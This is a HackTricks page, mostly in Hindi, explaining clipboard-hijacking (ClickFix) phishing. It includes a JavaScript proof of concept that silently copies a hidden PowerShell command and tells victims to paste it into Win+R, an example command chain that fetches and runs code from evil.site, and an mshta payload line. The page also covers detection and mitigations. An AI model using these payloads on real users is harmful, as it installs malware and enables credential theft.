Clipboard Hijacking (Pastejacking) Attacks
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
Azure हैकिंग सीखें और अभ्यास करें:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाओं की जांच करें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।
"आप कभी भी कुछ ऐसा न पेस्ट करें जो आपने खुद कॉपी नहीं किया।" – पुरानी लेकिन अभी भी मान्य सलाह
Overview
Clipboard hijacking – जिसे pastejacking भी कहा जाता है – इस तथ्य का दुरुपयोग करता है कि उपयोगकर्ता नियमित रूप से कमांड को कॉपी और पेस्ट करते हैं बिना उन्हें जांचे। एक दुर्भावनापूर्ण वेब पृष्ठ (या किसी भी JavaScript-सक्षम संदर्भ जैसे कि एक Electron या Desktop एप्लिकेशन) प्रोग्रामेटिक रूप से हमलावर-नियंत्रित पाठ को सिस्टम क्लिपबोर्ड में रखता है। पीड़ितों को, सामान्यतः सावधानीपूर्वक तैयार किए गए सोशल-इंजीनियरिंग निर्देशों द्वारा, Win + R (Run संवाद), Win + X (Quick Access / PowerShell) दबाने या एक टर्मिनल खोलने और क्लिपबोर्ड सामग्री को पेस्ट करने के लिए प्रोत्साहित किया जाता है, जिससे तुरंत मनमाने कमांड निष्पादित होते हैं।
क्योंकि कोई फ़ाइल डाउनलोड नहीं की जाती और कोई अटैचमेंट नहीं खोला जाता, यह तकनीक अधिकांश ई-मेल और वेब-सामग्री सुरक्षा नियंत्रणों को बायपास करती है जो अटैचमेंट, मैक्रोज़ या सीधे कमांड निष्पादन की निगरानी करती हैं। इसलिए यह हमला फ़िशिंग अभियानों में लोकप्रिय है जो NetSupport RAT, Latrodectus लोडर या Lumma Stealer जैसे कमोडिटी मैलवेयर परिवारों को वितरित करते हैं।
JavaScript Proof-of-Concept
<!-- Any user interaction (click) is enough to grant clipboard write permission in modern browsers -->
<button id="fix" onclick="copyPayload()">Fix the error</button>
<script>
function copyPayload() {
const payload = `powershell -nop -w hidden -enc <BASE64-PS1>`; // hidden PowerShell one-liner
navigator.clipboard.writeText(payload)
.then(() => alert('Now press Win+R , paste and hit Enter to fix the problem.'));
}
</script>
पुराने अभियानों ने document.execCommand('copy')
का उपयोग किया, जबकि नए अभियानों में असिंक्रोनस Clipboard API (navigator.clipboard.writeText
) पर निर्भरता होती है।
ClickFix / ClearFake प्रवाह
- उपयोगकर्ता एक टाइपोसक्वाटेड या समझौता किए गए साइट पर जाता है (जैसे
docusign.sa[.]com
) - इंजेक्टेड ClearFake जावास्क्रिप्ट एक
unsecuredCopyToClipboard()
सहायक को कॉल करता है जो चुपचाप एक Base64-कोडित PowerShell एक-लाइनर को क्लिपबोर्ड में स्टोर करता है। - HTML निर्देश पीड़ित को बताते हैं: “Win + R दबाएं, कमांड पेस्ट करें और समस्या को हल करने के लिए Enter दबाएं।”
powershell.exe
निष्पादित होता है, एक आर्काइव डाउनलोड करता है जिसमें एक वैध निष्पादन योग्य और एक दुर्भावनापूर्ण DLL (क्लासिक DLL साइडलोडिंग) होता है।- लोडर अतिरिक्त चरणों को डिक्रिप्ट करता है, शेलकोड इंजेक्ट करता है और स्थिरता स्थापित करता है (जैसे शेड्यूल किया गया कार्य) – अंततः NetSupport RAT / Latrodectus / Lumma Stealer चलाता है।
उदाहरण NetSupport RAT श्रृंखला
powershell -nop -w hidden -enc <Base64>
# ↓ Decodes to:
Invoke-WebRequest -Uri https://evil.site/f.zip -OutFile %TEMP%\f.zip ;
Expand-Archive %TEMP%\f.zip -DestinationPath %TEMP%\f ;
%TEMP%\f\jp2launcher.exe # Sideloads msvcp140.dll
jp2launcher.exe
(वैध Java WebStart) अपने निर्देशिका मेंmsvcp140.dll
की खोज करता है।- दुर्भावनापूर्ण DLL GetProcAddress के साथ APIs को गतिशील रूप से हल करता है, curl.exe के माध्यम से दो बाइनरी (
data_3.bin
,data_4.bin
) डाउनलोड करता है, उन्हें एक रोलिंग XOR कुंजी"https://google.com/"
का उपयोग करके डिक्रिप्ट करता है, अंतिम शेलकोड को इंजेक्ट करता है और client32.exe (NetSupport RAT) कोC:\ProgramData\SecurityCheck_v1\
में अनजिप करता है।
Latrodectus Loader
powershell -nop -enc <Base64> # Cloud Identificator: 2031
- curl.exe के साथ
la.txt
डाउनलोड करता है - cscript.exe के अंदर JScript डाउनलोडर को निष्पादित करता है
- एक MSI पेलोड लाता है → एक साइन किए गए एप्लिकेशन के बगल में
libcef.dll
छोड़ता है → DLL साइडलोडिंग → शेलकोड → Latrodectus।
MSHTA के माध्यम से Lumma Stealer
mshta https://iplogger.co/xxxx =+\\xxx
The mshta कॉल एक छिपा हुआ PowerShell स्क्रिप्ट लॉन्च करता है जो PartyContinued.exe
को प्राप्त करता है, Boat.pst
(CAB) को निकालता है, extrac32
और फ़ाइल संयोजन के माध्यम से AutoIt3.exe
को पुनर्निर्माण करता है और अंततः एक .a3x
स्क्रिप्ट चलाता है जो ब्राउज़र क्रेडेंशियल्स को sumeriavgv.digital
पर एक्सफिल्ट्रेट करता है।
Detection & Hunting
ब्लू-टीम क्लिपबोर्ड, प्रक्रिया-निर्माण और रजिस्ट्री टेलीमेट्री को मिलाकर पेस्टजैकिंग दुरुपयोग को पहचान सकती है:
- Windows Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Win + R कमांड का एक इतिहास रखता है - असामान्य Base64 / ओबफस्केटेड प्रविष्टियों की तलाश करें। - सुरक्षा इवेंट ID 4688 (प्रक्रिया निर्माण) जहां
ParentImage
==explorer.exe
औरNewProcessName
में {powershell.exe
,wscript.exe
,mshta.exe
,curl.exe
,cmd.exe
}। - इवेंट ID 4663 फ़ाइल निर्माण के लिए
%LocalAppData%\Microsoft\Windows\WinX\
या असामान्य 4688 इवेंट से ठीक पहले अस्थायी फ़ोल्डरों के तहत। - EDR क्लिपबोर्ड सेंसर (यदि मौजूद हैं) -
Clipboard Write
के तुरंत बाद एक नए PowerShell प्रक्रिया का सहसंबंध करें।
Mitigations
- ब्राउज़र हार्डनिंग - क्लिपबोर्ड लिखने की पहुंच को अक्षम करें (
dom.events.asyncClipboard.clipboardItem
आदि) या उपयोगकर्ता इशारा की आवश्यकता करें। - सुरक्षा जागरूकता - उपयोगकर्ताओं को संवेदनशील कमांड टाइप करने या पहले उन्हें टेक्स्ट संपादक में पेस्ट करने के लिए सिखाएं।
- PowerShell Constrained Language Mode / Execution Policy + Application Control को मनमाने एक-लाइनर्स को ब्लॉक करने के लिए।
- नेटवर्क नियंत्रण - ज्ञात पेस्टजैकिंग और मैलवेयर C2 डोमेन के लिए आउटबाउंड अनुरोधों को ब्लॉक करें।
Related Tricks
- Discord Invite Hijacking अक्सर एक दुर्भावनापूर्ण सर्वर में उपयोगकर्ताओं को लुभाने के बाद उसी ClickFix दृष्टिकोण का दुरुपयोग करता है: {{#ref}} discord-invite-hijacking.md {{#endref}}
References
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
Azure हैकिंग सीखें और अभ्यास करें:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाओं की जांच करें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।